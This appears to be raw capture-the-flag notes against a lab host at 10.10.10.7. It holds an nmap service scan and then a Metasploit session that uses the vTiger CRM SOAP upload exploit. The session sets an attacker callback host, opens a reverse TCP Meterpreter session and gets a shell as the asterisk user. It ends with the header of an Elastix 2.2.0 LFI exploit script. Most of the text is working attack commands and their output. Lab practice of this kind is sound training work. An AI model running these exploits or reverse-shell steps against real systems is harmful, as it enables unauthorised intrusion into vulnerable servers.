# Nmap 7.80 scan initiated Tue Apr 7 03:18:33 2020 as: nmap -sC -sV -Pn -oN ippsec_scan.txt 10.10.10.7 Nmap scan report for 10.10.10.7 Host is up (0.25s latency). Not shown: 987 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA) |_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA) 25/tcp open smtp Postfix smtpd |_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 80/tcp open http Apache httpd 2.2.3 |_http-server-header: Apache/2.2.3 (CentOS) |_http-title: Did not follow redirect to https://10.10.10.7/ |_https-redirect: ERROR: Script execution failed (use -d to debug) 110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 |_pop3-capabilities: TOP APOP UIDL IMPLEMENTATION(Cyrus POP3 server v2) LOGIN-DELAY(0) STLS RESP-CODES AUTH-RESP-CODE USER EXPIRE(NEVER) PIPELINING 111/tcp open rpcbind 2 (RPC #100000) 143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 |_imap-capabilities: THREAD=REFERENCES ATOMIC Completed MAILBOX-REFERRALS OK RENAME LISTEXT LITERAL+ MULTIAPPEND X-NETSCAPE LIST-SUBSCRIBED CHILDREN UNSELECT RIGHTS=kxte URLAUTHA0001 IDLE IMAP4rev1 SORT=MODSEQ ID BINARY IMAP4 CONDSTORE CATENATE SORT ANNOTATEMORE NO UIDPLUS STARTTLS ACL NAMESPACE THREAD=ORDEREDSUBJECT QUOTA 443/tcp open ssl/https? |_ssl-date: 2020-04-07T07:23:36+00:00; +1m25s from scanner time. 880/tcp open status 1 (RPC #100024) 993/tcp open ssl/imap Cyrus imapd |_imap-capabilities: CAPABILITY 995/tcp open pop3 Cyrus pop3d 3306/tcp open mysql MySQL (unauthorized) 4445/tcp open upnotifyp? 10000/tcp open http MiniServ 1.570 (Webmin httpd) |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com
Host script results: |_clock-skew: 1m24s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Apr 7 03:24:47 2020 -- 1 IP address (1 host up) scanned in 374.24 seconds
Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /vtigercrm/ yes Base vTiger CRM directory path VHOST no HTTP server virtual host
Exploit target:
Id Name -- ---- 0 vTigerCRM v5.4.0
msf5 exploit(multi/http/vtiger_soap_upload) > set RHOSTS 10.10.10.7 RHOSTS => 10.10.10.7 msf5 exploit(multi/http/vtiger_soap_upload) > set RPORT 443 RPORT => 443 msf5 exploit(multi/http/vtiger_soap_upload) > set SSL true SSL => true msf5 exploit(multi/http/vtiger_soap_upload) > set LHOST 10.10.14.5 LHOST => 10.10.14.5
msf5 exploit(multi/http/vtiger_soap_upload) > check [+] 10.10.10.7:443 - The target is vulnerable. msf5 exploit(multi/http/vtiger_soap_upload) > exploit
[*] Started reverse TCP handler on 10.10.14.5:4444 [*] Uploading payload... [+] Upload successfully uploaded [*] Executing payload... [*] Sending stage (38288 bytes) to 10.10.10.7 [*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.7:43989) at 2020-04-07 10:50:50 -0400 [!] This exploit may require manual cleanup of 'bPRojImibS.php' on the target
meterpreter > [+] Deleted bPRojImibS.php shell Process 8916 created. Channel 0 created. id uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
#!/usr/bin/perl -w #------------------------------------------------------------------------------------#Elastix is an Open Source Sofware to establish Unified Communications. #About this concept, Elastix goal is to incorporate all the communication alternatives, #available at an enterprise level, into a unique solution. #------------------------------------------------------------------------------------############################################################ # Exploit Title: Elastix 2.2.0 LFI # Google Dork: :( # Author: cheki # Version:Elastix 2.2.0 # Tested on: multiple # CVE : notyet # romanc-_-eyes ;) # Discovered by romanc-_-eyes # vendor http://www.elastix.org/